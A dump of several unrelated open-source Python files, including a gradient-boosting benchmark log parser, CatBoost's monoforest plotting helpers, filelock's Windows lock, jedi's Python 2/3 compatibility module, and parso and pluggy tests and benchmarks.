return Track.hash(self.experiment_name, self.algorithm_name, self.task_type, self.parameters_str)
def dump_to_json(self):
return {
self.__hash__(): {
"dataset": self.experiment_name,
"algorithm_name": self.algorithm_name,
"task_type": self.task_type,
"parameters": self.parameters_str,
"scores": list(self.scores),
"time_series": list(self.time_series),
"duration": self.duration
}
}
def get_series(self):
return self.time_series, self.scores
def get_time_per_iter(self):
return self.time_per_iter
def get_median_time_per_iter(self):
return np.median(self.time_per_iter)
def get_fit_iterations(self):
return self.time_series.shape[0]
def get_best_score(self):
return np.min(self.scores)
TASK_TYPES_ACCURACY = ['binclass', 'multiclass']
METRIC_NAME = {
'lightgbm': {'regression': 'rmse', 'binclass': 'binary_error', 'multiclass': 'multi_error'},
'xgboost': {'regression': 'eval-rmse', 'binclass': 'eval-error', 'multiclass': 'eval-merror'},
'catboost': {'regression': 'RMSE', 'binclass': 'Accuracy', 'multiclass': 'Accuracy'}
}
def parse_catboost_log(test_error_file, task_type, iterations):
values = []
with open(test_error_file) as metric_log:
file_content = metric_log.read()
first_line_idx = file_content.find('\n')
first_line = file_content[:first_line_idx]
header = first_line.split('\t')
column_idx = header.index(METRIC_NAME['catboost'][task_type])
regex = LOG_LINE_REGEX['catboost-tsv']
matches = regex.findall(file_content)
if len(matches) != int(iterations):
print('WARNING: Broken log file (num matches not equal num iterations): ' + test_error_file)
for match in matches:
value = float(match[column_idx])
if task_type in TASK_TYPES_ACCURACY:
# Convert to error
value = 1. - value
values.append(value)
return values
def parse_log(algorithm_name, experiment_name, task_type, params_str, file_name, iterations):
time_series = []
values = []
algorithm = algorithm_name.rstrip('-CPU|GPU')
if algorithm == 'catboost':
catboost_train_dir = file_name + 'dir'
test_error_file = os.path.join(catboost_train_dir, 'test_error.tsv')
values = parse_catboost_log(test_error_file, task_type, iterations)
with open(file_name, 'r') as log:
file_content = log.read()
regex = LOG_LINE_REGEX[algorithm]
matches = regex.findall(file_content)
if len(matches) != int(iterations):
print('WARNING: Broken log file ' + file_name)
for i, match in enumerate(matches):
time_series.append(float(match[0]))
if algorithm in ['lightgbm', 'xgboost']:
metric = match[2]
# Sanity check on parsed metric
assert metric == METRIC_NAME[algorithm][task_type]
values.append(float(match[3]))
duration = ELAPSED_REGEX.findall(file_content)
duration = float(duration[0]) if len(duration) > 0 else 0.
return Track(algorithm_name, experiment_name, task_type, params_str,
np.array(time_series), np.array(values), duration)
def read_results(results_file):
with open(results_file, 'r') as f:
results_json = json.load(f)
results = results_json.values()
tracks = {}
for result in results:
experiment_name = result["dataset"]
algorithm_name = result["algorithm_name"]
if experiment_name not in tracks:
tracks[experiment_name] = {}
if algorithm_name not in tracks[experiment_name]:
tracks[experiment_name][algorithm_name] = []
track = Track(algorithm_name, experiment_name, result["task_type"], result["parameters"],
np.array(result["time_series"]), np.array(result["scores"]), result["duration"])
tracks[experiment_name][algorithm_name].append(track)
return tracks
```
#### File: python-package/catboost/monoforest.py
```python
import math
from . import _catboost
from .core import CatBoost, CatBoostError
from .utils import _import_matplotlib
FeatureExplanation = _catboost.FeatureExplanation
def _check_model(model):
if not isinstance(model, CatBoost):
raise CatBoostError("Model should be CatBoost")
def to_polynom(model):
_check_model(model)
return _catboost.to_polynom(model._object)
def to_polynom_string(model):
_check_model(model)
return _catboost.to_polynom_string(model._object)
def explain_features(model):
_check_model(model)
return _catboost.explain_features(model._object)
def calc_features_strength(model):
explanations = explain_features(model)
features_strength = [expl.calc_strength() for expl in explanations]
return features_strength
def plot_pdp(arg, size_per_plot=(5, 5), plots_per_row=None):
with _import_matplotlib() as _plt:
plt = _plt
if isinstance(arg, CatBoost):
arg = explain_features(arg)
if isinstance(arg, _catboost.FeatureExplanation):
arg = [arg]
assert len(arg) > 0
assert isinstance(arg, list)
for element in arg:
assert isinstance(element, _catboost.FeatureExplanation)
figs = []
for feature_explanation in arg:
dimension = feature_explanation.dimension()
if not plots_per_row:
plots_per_row = min(5, dimension)
rows = int(math.ceil(dimension / plots_per_row))
fig, axes = plt.subplots(rows, plots_per_row)
fig.suptitle("Feature #{}".format(feature_explanation.feature))
if rows == 1:
axes = [axes]
if plots_per_row == 1:
axes = [[row_axes] for row_axes in axes]
fig.set_size_inches(size_per_plot[0] * plots_per_row, size_per_plot[1] * rows)
for dim in range(dimension):
ax = axes[dim // plots_per_row][dim % plots_per_row]
ax.set_title("Dimension={}".format(dim))
ax.set_xlabel("feature value")
ax.set_ylabel("model value")
borders, values = feature_explanation.calc_pdp(dim)
xs = []
ys = []
if feature_explanation.type == "Float":
if len(borders) == 0:
xs.append(-0.1)
xs.append(0.1)
ys.append(feature_explanation.expected_bias[dim])
ys.append(feature_explanation.expected_bias[dim])
ax.plot(xs, ys)
else:
offset = max(0.1, (borders[0] + borders[-1]) / 2)
xs.append(borders[0] - offset)
ys.append(feature_explanation.expected_bias[dim])
for border, value in zip(borders, values):
xs.append(border)
ys.append(ys[-1])
xs.append(border)
ys.append(value)
xs.append(borders[-1] + offset)
ys.append(ys[-1])
ax.plot(xs, ys)
else:
xs = ['bias'] + list(map(str, borders))
ys = feature_explanation.expected_bias[dim] + values
ax.bar(xs, ys)
figs.append(fig)
return figs
def plot_features_strength(model, height_per_feature=0.5, width_per_plot=5, plots_per_row=None):
with _import_matplotlib() as _plt:
plt = _plt
strengths = calc_features_strength(model)
dimension = len(strengths[0])
features = len(strengths)
if not plots_per_row:
plots_per_row = min(5, dimension)
rows = int(math.ceil(dimension / plots_per_row))
fig, axes = plt.subplots(rows, plots_per_row)
if rows == 1:
axes = [axes]
if plots_per_row == 1:
axes = [[row_axes] for row_axes in axes]
fig.suptitle("Features Strength")
fig.set_size_inches(width_per_plot * plots_per_row, height_per_feature * features * rows)
for dim in range(dimension):
strengths = [(s[dim], i) for i, s in enumerate(strengths)]
# strengths = list(reversed(sorted(strengths)))
strengths = list(sorted(strengths))
labels = ["Feature #{}".format(f) for _, f in strengths]
strengths = [s for s, _ in strengths]
ax = axes[dim // plots_per_row][dim % plots_per_row]
colors = [(1, 0, 0) if s > 0 else (0, 0, 1) for s in strengths]
ax.set_title("Dimension={}".format(dim))
ax.barh(range(len(strengths)), strengths, align='center', color=colors)
ax.set_yticks(range(len(strengths)))
ax.set_yticklabels(labels)
# ax.invert_yaxis() # labels read top-to-bottom
ax.set_xlabel('Prediction value change')
return fig
```
#### File: py2/filelock/_windows.py
```python
import os
from errno import ENOENT
from ._api import BaseFileLock
from ._util import raise_on_exist_ro_file
try:
import msvcrt
except ImportError:
msvcrt = None
class WindowsFileLock(BaseFileLock):
"""Uses the :func:`msvcrt.locking` function to hard lock the lock file on windows systems."""
def _acquire(self):
raise_on_exist_ro_file(self._lock_file)
mode = (
os.O_RDWR # open for read and write
| os.O_CREAT # create file if not exists
| os.O_TRUNC # truncate file if not empty
)
try:
fd = os.open(self._lock_file, mode)
except OSError as exception:
if exception.errno == ENOENT: # No such file or directory
raise
else:
try:
msvcrt.locking(fd, msvcrt.LK_NBLCK, 1)
except (OSError, IOError): # noqa: B014 # IOError is not OSError on python 2
os.close(fd)
else:
self._lock_file_fd = fd
def _release(self):
fd = self._lock_file_fd
self._lock_file_fd = None
msvcrt.locking(fd, msvcrt.LK_UNLCK, 1)
os.close(fd)
try:
os.remove(self._lock_file)
# Probably another instance of the application hat acquired the file lock.
except OSError:
pass
__all__ = [
"WindowsFileLock",
]
```
#### File: jedi/jedi/_compatibility.py
```python
import errno
import sys
import os
import re
import pkgutil
import warnings
import inspect
import subprocess
try:
import importlib
except ImportError:
pass
is_py3 = sys.version_info[0] >= 3
is_py35 = is_py3 and sys.version_info[1] >= 5
py_version = int(str(sys.version_info[0]) + str(sys.version_info[1]))
class DummyFile(object):
def __init__(self, loader, string):
self.loader = loader
self.string = string
def read(self):
return self.loader.get_source(self.string)
def close(self):
del self.loader
def find_module_py34(string, path=None, full_name=None, is_global_search=True):
spec = None
loader = None
for finder in sys.meta_path:
if is_global_search and finder != importlib.machinery.PathFinder:
p = None
else:
p = path
try:
find_spec = finder.find_spec
except AttributeError:
# These are old-school clases that still have a different API, just
# ignore those.
continue
spec = find_spec(string, p)
if spec is not None:
loader = spec.loader
if loader is None and not spec.has_location:
# This is a namespace package.
full_name = string if not path else full_name
implicit_ns_info = ImplicitNSInfo(full_name, spec.submodule_search_locations._path)
return None, implicit_ns_info, False
break
return find_module_py33(string, path, loader)
def find_module_py33(string, path=None, loader=None, full_name=None, is_global_search=True):
loader = loader or importlib.machinery.PathFinder.find_module(string, path)
if loader is None and path is None: # Fallback to find builtins
try:
with warnings.catch_warnings(record=True):
# Mute "DeprecationWarning: Use importlib.util.find_spec()
# instead." While we should replace that in the future, it's
# probably good to wait until we deprecate Python 3.3, since
# it was added in Python 3.4 and find_loader hasn't been
# removed in 3.6.
loader = importlib.find_loader(string)
except ValueError as e:
# See #491. Importlib might raise a ValueError, to avoid this, we
# just raise an ImportError to fix the issue.
raise ImportError("Originally " + repr(e))
if loader is None:
raise ImportError("Couldn't find a loader for {}".format(string))
try:
is_package = loader.is_package(string)
if is_package:
if hasattr(loader, 'path'):
module_path = os.path.dirname(loader.path)
else:
# At least zipimporter does not have path attribute
module_path = os.path.dirname(loader.get_filename(string))
if hasattr(loader, 'archive'):
module_file = DummyFile(loader, string)
else:
module_file = None
else:
module_path = loader.get_filename(string)
module_file = DummyFile(loader, string)
except AttributeError:
# ExtensionLoader has not attribute get_filename, instead it has a
# path attribute that we can use to retrieve the module path
try:
module_path = loader.path
module_file = DummyFile(loader, string)
except AttributeError:
module_path = string
module_file = None
finally:
is_package = False
if hasattr(loader, 'archive'):
module_path = loader.archive
return module_file, module_path, is_package
def find_module_pre_py34(string, path=None, full_name=None, is_global_search=True):
# This import is here, because in other places it will raise a
# DeprecationWarning.
import imp
try:
module_file, module_path, description = imp.find_module(string, path)
module_type = description[2]
return module_file, module_path, module_type is imp.PKG_DIRECTORY
except ImportError:
pass
if path is None:
path = sys.path
for item in path:
loader = pkgutil.get_importer(item)
if loader:
try:
loader = loader.find_module(string)
if loader:
is_package = loader.is_package(string)
is_archive = hasattr(loader, 'archive')
module_path = loader.get_filename(string)
if is_package:
module_path = os.path.dirname(module_path)
if is_archive:
module_path = loader.archive
file = None
if not is_package or is_archive:
file = DummyFile(loader, string)
return file, module_path, is_package
except ImportError:
pass
raise ImportError("No module named {}".format(string))
find_module = find_module_py34 if is_py3 else find_module_pre_py34
find_module.__doc__ = """
Provides information about a module.
This function isolates the differences in importing libraries introduced with
python 3.3 on; it gets a module name and optionally a path. It will return a
tuple containin an open file for the module (if not builtin), the filename
or the name of the module if it is a builtin one and a boolean indicating
if the module is contained in a package.
"""
def _iter_modules(paths, prefix=''):
# Copy of pkgutil.iter_modules adapted to work with namespaces
for path in paths:
importer = pkgutil.get_importer(path)
if not isinstance(importer, importlib.machinery.FileFinder):
# We're only modifying the case for FileFinder. All the other cases
# still need to be checked (like zip-importing). Do this by just
# calling the pkgutil version.
for mod_info in pkgutil.iter_modules([path], prefix):
yield mod_info
continue
# START COPY OF pkutils._iter_file_finder_modules.
if importer.path is None or not os.path.isdir(importer.path):
return
yielded = {}
try:
filenames = os.listdir(importer.path)
except OSError:
# ignore unreadable directories like import does
filenames = []
filenames.sort() # handle packages before same-named modules
for fn in filenames:
modname = inspect.getmodulename(fn)
if modname == '__init__' or modname in yielded:
continue
# jedi addition: Avoid traversing special directories
if fn.startswith('.') or fn == '__pycache__':
continue
path = os.path.join(importer.path, fn)
ispkg = False
if not modname and os.path.isdir(path) and '.' not in fn:
modname = fn
# A few jedi modifications: Don't check if there's an
# __init__.py
try:
os.listdir(path)
except OSError:
# ignore unreadable directories like import does
continue
ispkg = True
if modname and '.' not in modname:
yielded[modname] = 1
yield importer, prefix + modname, ispkg
# END COPY
iter_modules = _iter_modules if py_version >= 34 else pkgutil.iter_modules
class ImplicitNSInfo(object):
"""Stores information returned from an implicit namespace spec"""
def __init__(self, name, paths):
self.name = name
self.paths = paths
if is_py3:
all_suffixes = importlib.machinery.all_suffixes
else:
def all_suffixes():
# Is deprecated and raises a warning in Python 3.6.
import imp
return [suffix for suffix, _, _ in imp.get_suffixes()]
# unicode function
try:
unicode = unicode
except NameError:
unicode = str
# re-raise function
if is_py3:
def reraise(exception, traceback):
raise exception.with_traceback(traceback)
else:
eval(compile("""
def reraise(exception, traceback):
raise exception, None, traceback
""", 'blub', 'exec'))
reraise.__doc__ = """
Re-raise `exception` with a `traceback` object.
Usage::
reraise(Exception, sys.exc_info()[2])
"""
class Python3Method(object):
def __init__(self, func):
self.func = func
def __get__(self, obj, objtype):
if obj is None:
return lambda *args, **kwargs: self.func(*args, **kwargs)
else:
return lambda *args, **kwargs: self.func(obj, *args, **kwargs)
def use_metaclass(meta, *bases):
""" Create a class with a metaclass. """
if not bases:
bases = (object,)
return meta("Py2CompatibilityMetaClass", bases, {})
try:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
except AttributeError:
encoding = 'ascii'
def u(string, errors='strict'):
"""Cast to unicode DAMMIT!
Written because Python2 repr always implicitly casts to a string, so we
have to cast back to a unicode (and we now that we always deal with valid
unicode, because we check that in the beginning).
"""
if isinstance(string, bytes):
return unicode(string, encoding='UTF-8', errors=errors)
return string
def cast_path(obj):
"""
Take a bytes or str path and cast it to unicode.
Apparently it is perfectly fine to pass both byte and unicode objects into
the sys.path. This probably means that byte paths are normal at other
places as well.
Since this just really complicates everything and Python 2.7 will be EOL
soon anyway, just go with always strings.
"""
return u(obj, errors='replace')
def force_unicode(obj):
# Intentionally don't mix those two up, because those two code paths might
# be different in the future (maybe windows?).
return cast_path(obj)
try:
import builtins # module name in python 3
except ImportError:
import __builtin__ as builtins # noqa: F401
import ast # noqa: F401
def literal_eval(string):
return ast.literal_eval(string)
try:
from itertools import zip_longest
except ImportError:
from itertools import izip_longest as zip_longest # Python 2 # noqa: F401
try:
FileNotFoundError = FileNotFoundError
except NameError:
FileNotFoundError = IOError
try:
NotADirectoryError = NotADirectoryError
except NameError:
NotADirectoryError = IOError
try:
PermissionError = PermissionError
except NameError:
PermissionError = IOError
def no_unicode_pprint(dct):
"""
Python 2/3 dict __repr__ may be different, because of unicode differens
(with or without a `u` prefix). Normally in doctests we could use `pprint`
to sort dicts and check for equality, but here we have to write a separate
function to do that.
"""
import pprint
s = pprint.pformat(dct)
print(re.sub("u'", "'", s))
def print_to_stderr(*args):
if is_py3:
eval("print(*args, file=sys.stderr)")
else:
print >> sys.stderr, args
sys.stderr.flush()
def utf8_repr(func):
"""
``__repr__`` methods in Python 2 don't allow unicode objects to be
returned. Therefore cast them to utf-8 bytes in this decorator.
"""
def wrapper(self):
result = func(self)
if isinstance(result, unicode):
return result.encode('utf-8')
else:
return result
if is_py3:
return func
else:
return wrapper
if is_py3:
import queue
else:
import Queue as queue # noqa: F401
try:
# Attempt to load the C implementation of pickle on Python 2 as it is way
# faster.
import cPickle as pickle
except ImportError:
import pickle
if sys.version_info[:2] == (3, 3):
"""
Monkeypatch the unpickler in Python 3.3. This is needed, because the
argument `encoding='bytes'` is not supported in 3.3, but badly needed to
communicate with Python 2.
"""
class NewUnpickler(pickle._Unpickler):
dispatch = dict(pickle._Unpickler.dispatch)
def _decode_string(self, value):
# Used to allow strings from Python 2 to be decoded either as
# bytes or Unicode strings. This should be used only with the
# STRING, BINSTRING and SHORT_BINSTRING opcodes.
if self.encoding == "bytes":
return value
else:
return value.decode(self.encoding, self.errors)
def load_string(self):
data = self.readline()[:-1]
# Strip outermost quotes
if len(data) >= 2 and data[0] == data[-1] and data[0] in b'"\'':
data = data[1:-1]
else:
raise pickle.UnpicklingError("the STRING opcode argument must be quoted")
self.append(self._decode_string(pickle.codecs.escape_decode(data)[0]))
dispatch[pickle.STRING[0]] = load_string
def load_binstring(self):
# Deprecated BINSTRING uses signed 32-bit length
len, = pickle.struct.unpack('<i', self.read(4))
if len < 0:
raise pickle.UnpicklingError("BINSTRING pickle has negative byte count")
data = self.read(len)
self.append(self._decode_string(data))
dispatch[pickle.BINSTRING[0]] = load_binstring
def load_short_binstring(self):
len = self.read(1)[0]
data = self.read(len)
self.append(self._decode_string(data))
dispatch[pickle.SHORT_BINSTRING[0]] = load_short_binstring
def load(file, fix_imports=True, encoding="ASCII", errors="strict"):
return NewUnpickler(file, fix_imports=fix_imports,
encoding=encoding, errors=errors).load()
def loads(s, fix_imports=True, encoding="ASCII", errors="strict"):
if isinstance(s, str):
raise TypeError("Can't load pickle from unicode string")
file = pickle.io.BytesIO(s)
return NewUnpickler(file, fix_imports=fix_imports,
encoding=encoding, errors=errors).load()
pickle.Unpickler = NewUnpickler
pickle.load = load
pickle.loads = loads
def pickle_load(file):
try:
if is_py3:
return pickle.load(file, encoding='bytes')
return pickle.load(file)
# Python on Windows don't throw EOF errors for pipes. So reraise them with
# the correct type, which is caught upwards.
except OSError:
if sys.platform == 'win32':
raise EOFError()
raise
def pickle_dump(data, file, protocol):
try:
pickle.dump(data, file, protocol)
# On Python 3.3 flush throws sometimes an error even though the writing
# operation should be completed.
file.flush()
# Python on Windows don't throw EPIPE errors for pipes. So reraise them with
# the correct type and error number.
except OSError:
if sys.platform == 'win32':
raise IOError(errno.EPIPE, "Broken pipe")
raise
# Determine the highest protocol version compatible for a given list of Python
# versions.
def highest_pickle_protocol(python_versions):
protocol = 4
for version in python_versions:
if version[0] == 2:
# The minimum protocol version for the versions of Python that we
# support (2.7 and 3.3+) is 2.
return 2
if version[1] < 4:
protocol = 3
return protocol
try:
from inspect import Parameter
except ImportError:
class Parameter(object):
POSITIONAL_ONLY = object()
POSITIONAL_OR_KEYWORD = object()
VAR_POSITIONAL = object()
KEYWORD_ONLY = object()
VAR_KEYWORD = object()
class GeneralizedPopen(subprocess.Popen):
def __init__(self, *args, **kwargs):
if os.name == 'nt':
try:
# Was introduced in Python 3.7.
CREATE_NO_WINDOW = subprocess.CREATE_NO_WINDOW
except AttributeError:
CREATE_NO_WINDOW = 0x08000000
kwargs['creationflags'] = CREATE_NO_WINDOW
# The child process doesn't need file descriptors except 0, 1, 2.
# This is unix only.
kwargs['close_fds'] = 'posix' in sys.builtin_module_names
super(GeneralizedPopen, self).__init__(*args, **kwargs)
# shutil.which is not available on Python 2.7.
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if os.curdir not in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if normdir not in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
```
#### File: tests/normalizer_issue_files/allowed_syntax_python3.6.py
```python
foo: int = 4
(foo): int = 3
((foo)): int = 3
foo.bar: int
foo[3]: int
def glob():
global x
y: foo = x
def c():
a = 3
def d():
class X():
nonlocal a
def x():
a = 3
def y():
nonlocal a
def x():
def y():
nonlocal a
a = 3
def x():
a = 3
def y():
class z():
nonlocal a
a = *args, *args
error[(*args, *args)] = 3
*args, *args
```
#### File: py3/tests/test_pgen2.py
```python
from textwrap import dedent
import pytest
from parso import load_grammar
from parso import ParserSyntaxError
from parso.pgen2 import generate_grammar
from parso.python import tokenize
def _parse(code, version=None):
code = dedent(code) + "\n\n"
grammar = load_grammar(version=version)
return grammar.parse(code, error_recovery=False)
def _invalid_syntax(code, version=None, **kwargs):
with pytest.raises(ParserSyntaxError):
module = _parse(code, version=version, **kwargs)
# For debugging
print(module.children)
def test_formfeed(each_version):
s = "foo\n\x0c\nfoo\n"
t = _parse(s, each_version)
assert t.children[0].children[0].type == 'name'
assert t.children[1].children[0].type == 'name'
s = "1\n\x0c\x0c\n2\n"
t = _parse(s, each_version)
with pytest.raises(ParserSyntaxError):
s = "\n\x0c2\n"
_parse(s, each_version)
def test_matrix_multiplication_operator(works_in_py):
works_in_py.parse("a @ b")
works_in_py.parse("a @= b")
def test_yield_from(works_in_py, each_version):
works_in_py.parse("yield from x")
works_in_py.parse("(yield from x) + y")
_invalid_syntax("yield from", each_version)
def test_await_expr(works_in_py):
works_in_py.parse("""async def foo():
await x
""")
works_in_py.parse("""async def foo():
def foo(): pass
def foo(): pass
await x
""")
works_in_py.parse("""async def foo(): return await a""")
works_in_py.parse("""def foo():
def foo(): pass
async def foo(): await x
""")
@pytest.mark.parametrize(
'code', [
"async = 1",
"await = 1",
"def async(): pass",
]
)
def test_async_var(works_not_in_py, code):
works_not_in_py.parse(code)
def test_async_for(works_in_py):
works_in_py.parse("async def foo():\n async for a in b: pass")
@pytest.mark.parametrize("body", [
"""[1 async for a in b
]""",
"""[1 async
for a in b
]""",
"""[
1
async for a in b
]""",
"""[
1
async for a
in b
]""",
"""[
1
async
for
a
in
b
]""",
""" [
1 async for a in b
]""",
])
def test_async_for_comprehension_newline(works_in_py, body):
# Issue #139
works_in_py.parse("""async def foo():
{}""".format(body))
def test_async_with(works_in_py):
works_in_py.parse("async def foo():\n async with a: pass")
def test_async_with_invalid(works_in_py):
works_in_py.parse("""def foo():\n async with a: pass""")
def test_raise_3x_style_1(each_version):
_parse("raise", each_version)
def test_raise_2x_style_2(works_not_in_py):
works_not_in_py.parse("raise E, V")
def test_raise_2x_style_3(works_not_in_py):
works_not_in_py.parse("raise E, V, T")
def test_raise_2x_style_invalid_1(each_version):
_invalid_syntax("raise E, V, T, Z", version=each_version)
def test_raise_3x_style(works_in_py):
works_in_py.parse("raise E1 from E2")
def test_raise_3x_style_invalid_1(each_version):
_invalid_syntax("raise E, V from E1", each_version)
def test_raise_3x_style_invalid_2(each_version):
_invalid_syntax("raise E from E1, E2", each_version)
def test_raise_3x_style_invalid_3(each_version):
_invalid_syntax("raise from E1, E2", each_version)
def test_raise_3x_style_invalid_4(each_version):
_invalid_syntax("raise E from", each_version)
# Adapted from Python 3's Lib/test/test_grammar.py:GrammarTests.testFuncdef
def test_annotation_1(works_in_py):
works_in_py.parse("""def f(x) -> list: pass""")
def test_annotation_2(works_in_py):
works_in_py.parse("""def f(x:int): pass""")
def test_annotation_3(works_in_py):
works_in_py.parse("""def f(*x:str): pass""")
def test_annotation_4(works_in_py):
works_in_py.parse("""def f(**x:float): pass""")
def test_annotation_5(works_in_py):
works_in_py.parse("""def f(x, y:1+2): pass""")
def test_annotation_6(each_version):
_invalid_syntax("""def f(a, (b:1, c:2, d)): pass""", each_version)
def test_annotation_7(each_version):
_invalid_syntax("""def f(a, (b:1, c:2, d), e:3=4, f=5, *g:6): pass""", each_version)
def test_annotation_8(each_version):
s = """def f(a, (b:1, c:2, d), e:3=4, f=5,
*g:6, h:7, i=8, j:9=10, **k:11) -> 12: pass"""
_invalid_syntax(s, each_version)
def test_except_new(each_version):
s = dedent("""
try:
x
except E as N:
y""")
_parse(s, each_version)
def test_except_old(works_not_in_py):
s = dedent("""
try:
x
except E, N:
y""")
works_not_in_py.parse(s)
# Adapted from Python 3's Lib/test/test_grammar.py:GrammarTests.testAtoms
def test_set_literal_1(works_in_py):
works_in_py.parse("""x = {'one'}""")
def test_set_literal_2(works_in_py):
works_in_py.parse("""x = {'one', 1,}""")
def test_set_literal_3(works_in_py):
works_in_py.parse("""x = {'one', 'two', 'three'}""")
def test_set_literal_4(works_in_py):
works_in_py.parse("""x = {2, 3, 4,}""")
def test_new_octal_notation(each_version):
_parse("""0o7777777777777""", each_version)
_invalid_syntax("""0o7324528887""", each_version)
def test_old_octal_notation(works_not_in_py):
works_not_in_py.parse("07")
def test_long_notation(works_not_in_py):
works_not_in_py.parse("0xFl")
works_not_in_py.parse("0xFL")
works_not_in_py.parse("0b1l")
works_not_in_py.parse("0B1L")
works_not_in_py.parse("0o7l")
works_not_in_py.parse("0O7L")
works_not_in_py.parse("0l")
works_not_in_py.parse("0L")
works_not_in_py.parse("10l")
works_not_in_py.parse("10L")
def test_new_binary_notation(each_version):
_parse("""0b101010""", each_version)
_invalid_syntax("""0b0101021""", each_version)
def test_class_new_syntax(works_in_py):
works_in_py.parse("class B(t=7): pass")
works_in_py.parse("class B(t, *args): pass")
works_in_py.parse("class B(t, **kwargs): pass")
works_in_py.parse("class B(t, *args, **kwargs): pass")
works_in_py.parse("class B(t, y=9, *args, **kwargs): pass")
def test_parser_idempotency_extended_unpacking(works_in_py):
"""A cut-down version of pytree_idempotency.py."""
works_in_py.parse("a, *b, c = x\n")
works_in_py.parse("[*a, b] = x\n")
works_in_py.parse("(z, *y, w) = m\n")
works_in_py.parse("for *z, m in d: pass\n")
def test_multiline_bytes_literals(each_version):
s = """
md5test(b"\xaa" * 80,
(b"Test Using Larger Than Block-Size Key "
b"and Larger Than One Block-Size Data"),
"6f630fad67cda0ee1fb1f562db3aa53e")
"""
_parse(s, each_version)
def test_multiline_bytes_tripquote_literals(each_version):
s = '''
b"""
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN">
"""
'''
_parse(s, each_version)
def test_ellipsis(works_in_py, each_version):
works_in_py.parse("...")
_parse("[0][...]", version=each_version)
def test_dict_unpacking(works_in_py):
works_in_py.parse("{**dict(a=3), foo:2}")
def test_multiline_str_literals(each_version):
s = """
md5test("\xaa" * 80,
("Test Using Larger Than Block-Size Key "
"and Larger Than One Block-Size Data"),
"6f630fad67cda0ee1fb1f562db3aa53e")
"""
_parse(s, each_version)
def test_py2_backticks(works_not_in_py):
works_not_in_py.parse("`1`")
def test_py2_string_prefixes(works_not_in_py):
works_not_in_py.parse("ur'1'")
works_not_in_py.parse("Ur'1'")
works_not_in_py.parse("UR'1'")
_invalid_syntax("ru'1'", works_not_in_py.version)
def py_br(each_version):
_parse('br""', each_version)
def test_py3_rb(works_in_py):
works_in_py.parse("rb'1'")
works_in_py.parse("RB'1'")
def test_left_recursion():
with pytest.raises(ValueError, match='left recursion'):
generate_grammar('foo: foo NAME\n', tokenize.PythonTokenTypes)
@pytest.mark.parametrize(
'grammar, error_match', [
['foo: bar | baz\nbar: NAME\nbaz: NAME\n',
r"foo is ambiguous.*given a (PythonTokenTypes\.)?NAME.*bar or baz"],
['''foo: bar | baz\nbar: 'x'\nbaz: "x"\n''',
r"foo is ambiguous.*given a ReservedString\(x\).*bar or baz"],
['''foo: bar | 'x'\nbar: 'x'\n''',
r"foo is ambiguous.*given a ReservedString\(x\).*bar or foo"],
# An ambiguity with the second (not the first) child of a production
['outer: "a" [inner] "b" "c"\ninner: "b" "c" [inner]\n',
r"outer is ambiguous.*given a ReservedString\(b\).*inner or outer"],
# An ambiguity hidden by a level of indirection (middle)
['outer: "a" [middle] "b" "c"\nmiddle: inner\ninner: "b" "c" [inner]\n',
r"outer is ambiguous.*given a ReservedString\(b\).*middle or outer"],
]
)
def test_ambiguities(grammar, error_match):
with pytest.raises(ValueError, match=error_match):
generate_grammar(grammar, tokenize.PythonTokenTypes)
```
#### File: py3/tests/benchmark.py
```python
import pytest
from pluggy import HookspecMarker, HookimplMarker, PluginManager
from pluggy._hooks import HookImpl
from pluggy._callers import _multicall
hookspec = HookspecMarker("example")
hookimpl = HookimplMarker("example")
@hookimpl
def hook(arg1, arg2, arg3):
return arg1, arg2, arg3
@hookimpl(hookwrapper=True)
def wrapper(arg1, arg2, arg3):
yield
@pytest.fixture(params=[10, 100], ids="hooks={}".format)
def hooks(request):
return [hook for i in range(request.param)]
@pytest.fixture(params=[10, 100], ids="wrappers={}".format)
def wrappers(request):
return [wrapper for i in range(request.param)]
def test_hook_and_wrappers_speed(benchmark, hooks, wrappers):
def setup():
hook_name = "foo"
hook_impls = []
for method in hooks + wrappers:
f = HookImpl(None, "<temp>", method, method.example_impl)
hook_impls.append(f)
caller_kwargs = {"arg1": 1, "arg2": 2, "arg3": 3}
firstresult = False
return (hook_name, hook_impls, caller_kwargs, firstresult), {}
benchmark.pedantic(_multicall, setup=setup)
@pytest.mark.parametrize(
("plugins, wrappers, nesting"),
[
(1, 1, 0),
(1, 1, 1),
(1, 1, 5),
(1, 5, 1),
(1, 5, 5),
(5, 1, 1),
(5, 1, 5),
(5, 5, 1),
(5, 5, 5),
(20, 20, 0),
(100, 100, 0),
],
)
def test_call_hook(benchmark, plugins, wrappers, nesting):
pm = PluginManager("example")
class HookSpec:
@hookspec
def fun(self, hooks, nesting: int):
yield
class Plugin:
def __init__(self, num):
self.num = num
def __repr__(self):
return f"<Plugin {self.num}>"
@hookimpl
def fun(self, hooks, nesting: int):
if nesting:
hooks.fun(hooks=hooks, nesting=nesting - 1)
class PluginWrap:
def __init__(self, num):
self.num = num
def __repr__(self):
return f"<PluginWrap {self.num}>"
@hookimpl(hookwrapper=True)
def fun(self):
yield
